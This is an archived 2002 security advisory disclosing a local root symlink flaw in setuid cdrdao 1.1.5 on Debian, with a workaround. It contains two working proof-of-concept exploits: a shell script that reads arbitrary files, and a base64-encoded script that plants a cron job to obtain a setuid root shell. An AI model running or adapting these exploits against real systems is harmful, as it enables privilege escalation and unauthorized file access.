Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Linux :: Apps A-M :: lnx4999.htm

Cdrdao local symlink attack leads to root access



15th Jan 2002 [SBWID-4999]
COMMAND

	Cdrdao local symlink attack leads to root access

SYSTEMS AFFECTED

	Cdrdao 1.1.5

PROBLEM

	Jens \"atomi\" Steube found :
	

	There is a symlink vulnerability in  the  $HOME/.cdrao  parsing  of  the
	program.
	

	 Exploit : see shell script at the end of message 

	 =========

	

	 Update : Exploit 2, read files provided by Guillaume PELAT 

	 [http://www.intexxia.com]

	

	

	#!/bin/sh

	

	if [ \"$1\" ]; then

		cat > /tmp/t.c <<EOF

	#include <stdio.h>

	int     main()

	{

		int     i;

		while (fscanf(stdin, \"%i\", &i) > 0)

		{

			printf(\"%c%c\", (i & 0xff00) >> 8, i & 0xff);

		}

		return 0;

	}

	EOF

		cat > /tmp/t.toc <<EOF

	CD_ROM

	TRACK MODE1_RAW

	FILE \"$1\" 0

	EOF

		gcc /tmp/t.c -o /tmp/show

		echo `cdrdao show-data -v 0 --force /tmp/t.toc 2>&1 | grep -v WARNING | =

	sed \'s/.*://g\' ` | /tmp/show

		rm -f /tmp/t.c /tmp/show /tmp/t.toc

	else

		echo \"Syntax: $0 filename\"

	fi

	

	

	

	--[ Description ]--

	

	There are several security-related Bugs in the distributed 

	Debian (SID) Package of CDRDAO, a program to write audio or mixed 

	mode CD-Rs in disk-at-once mode. /usr/bin/cdrdao is setuid-Root 

	by default.

	

	

	--[ Version ]--

	

	Name: Cdrdao 

	Version: 1.1.5 

	Autor: Andreas Mueller <andreas@daneb.de>

	

	

	--[ Impact ]--

	

	Local users can gain unauthorized root access to the system.

	

	

	--[ Legal ]--

	

	The information in this advisory may be distributed or 

	reproduced, provided that the advisory is not modified in any way.

	The Autor makes no warranties of any kind to the information 

	contained in this security advisory.

	

	

	--[ Bugs ]--

	

	Cdrdao doesnt check for permissions when it trys to open a file

	as its \"toc-file\". So it was possible to open all Files on the

	System, but it skips the Output on its Error-Message. Maybe it is

	possible to trick to read all these Files. As i tested around to 

	trick i found another Bug.

	

	This more important Bug is that cdrdao can also write a 

	configfile which is written to \"$HOME/.cdrdao\". it is written by 

	the Root-User and not as the User who starts cdrdao. It is possible 

	to include data on the written configfile and so it is possible to 

	gain root via a symlink-attack on $HOME/.cdrdao

	

	After i found these Bugs i stopped to search for more Bugs.

	

	

	--[ Fix ]--

	

	Not tried to fix. 

	

	The Autor, the Debian Package Maintainer and the Debian 

	Bugtracking System (#127930) where informed one week before

	this Post, but there was no response.

	

	

	--[ Tested on ]--

	

	Debian GNU/Linux SID on i386, installed gcc and running cron

	

	

	--[ Credits ]--

	

	Found and exploited by Jens \"atomi\" Steube.

	

	Greets go out to: impulse, symbiont, mot, para, sharkking, kartan 

	and all other friend on #altoetting and #perl.de on ircnet.

	

	

	--[ Proof of concept exploit ]--

	

	The attached exploit is designed for the Debian (SID) Package 

	and not tested on other Systems. 

	

	

	

	Regards,

	

	Jens Steube

	jsteube@lastflood.com

	

	

	---MOQ1010876960ed76bc7809e9920c116577c98a0ffdb0

	Content-Type: application/octet-stream; name=; name=\"cdrdaohack.sh\"

	Content-Transfer-Encoding: base64

	Content-Disposition: attachment; filename=\"cdrdaohack.sh\"

	

	IyEvYmluL2Jhc2gKCiMjIGNkcmRhb2hhY2suc2ggYnkgSmVucyAiYXRvbWkiIFN0ZXViZQoKUk9P

	VEVYRUNESVI9Ii9ldGMvY3Jvbi5kL2NkciIKQ0RSREFPPSIvdXNyL2Jpbi9jZHJkYW8iClVTRVJD

	T05GPSIkSE9NRS8uY2RyZGFvIgoKZWNobyAiVGVzdGluZyAkQ0RSREFPIgppZiBbICEgLXUgJENE

	UkRBTyBdOyB0aGVuCiAgZWNobyAiRVJST1I6ICRDRFJEQU8gaXMgbm90IHNldHVpZCBvciBkb2Vz

	IG5vdCBleGlzdCIKICBleGl0IDEKZmkKCmVjaG8gIkdlbmVyYXRpbmcgSGVscGVyIEZpbGVzIgoK

	Y2F0ID4gL3RtcC9kYW9zaC5jIDw8IEVPRgppbnQgbWFpbiAoKSB7IApzZXR1aWQoMCk7IHNldGdp

	ZCgwKTsKdW5saW5rKCIvdG1wL2Rhby5zaCIpOwp1bmxpbmsoIi90bXAvZGFvc2guYyIpOwp1bmxp

	bmsoIi9ldGMvY3Jvbi5kL2NkciIpOwp1bmxpbmsoIiRIT01FLy5jZHJkYW8iKTsKZXhlY2woIi9i

	aW4vYmFzaCIsImJhc2giLCItaSIsMCk7Cn0KRU9GCgpjYXQgPiAvdG1wL2Rhby5zaCA8PCBFT0YK

	Y2MgLW8gL3RtcC9kYW9zaCAvdG1wL2Rhb3NoLmMgPi9kZXYvbnVsbCAyPiYxCmNob3duIHJvb3Qg

	L3RtcC9kYW9zaCA+L2Rldi9udWxsIDI+JjEKY2hncnAgcm9vdCAvdG1wL2Rhb3NoID4vZGV2L251

	bGwgMj4mMQpjaG1vZCA2NzU1IC90bXAvZGFvc2ggPi9kZXYvbnVsbCAyPiYxCmV4aXQgMApFT0YK

	CmNobW9kIDcwMCAvdG1wL2Rhby5zaAoKZWNobyAiQmFja2luZyB1cCBvcmlnaW5hbCAkVVNFUkNP

	TkYgZmlsZSB0byAkVVNFUkNPTkYub3JpZyIKbXYgJFVTRVJDT05GICRVU0VSQ09ORi5vcmlnID4v

	ZGV2L251bGwgMj4mMQoKZWNobyAiQ3JlYXRpbmcgU3ltbGluayBvbiAkVVNFUkNPTkYgdG8gJFJP

	T1RFWEVDRElSIgpsbiAtcyAkUk9PVEVYRUNESVIgJFVTRVJDT05GCgplY2hvICJFeGVjdXRpbmcg

	JENEUkRBTyIKCiRDRFJEQU8gd3JpdGUgLS1zYXZlIC0tZGV2aWNlICcKKiAqICogKiAqIHJvb3Qg

	L3RtcC9kYW8uc2ggPi9kZXYvbnVsbCAyPiYxCiMnIC0tYnVmZmVycyAnCicgLiA+L2Rldi9udWxs

	IDI+JjEKCmVjaG8gIldhaXRpbmcgZm9yIFJvb3RzaGVsbCwgd2FpdCBhdCBsZWFzdCAzIG1pbnV0

	ZXMiCndoaWxlIFsgISAtdSAvdG1wL2Rhb3NoIF07IGRvCiAgZWNobyAtbiAiLiIKICBzbGVlcCAx

	CmRvbmUKCmVjaG8KZWNobyAiRW50ZXJpbmcgUm9vdHNoZWxsIGFuZCByZW1vdmluZyBIZWxwZXIg

	RmlsZXMiCmVjaG8gIkhhdmUgUGh1biA6LSkiCi90bXAvZGFvc2gKCg==

	

	

	---MOQ1010876960ed76bc7809e9920c116577c98a0ffdb0--

	

SOLUTION

	A work around on debian is to:
	

	dpkg-statoverride --update --add root root 0755 /usr/bin/cdrdao 

	

	This tells dpkg that cdrdao is not to be suid  root  anymore,  at  least
	until you change or delete that override.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH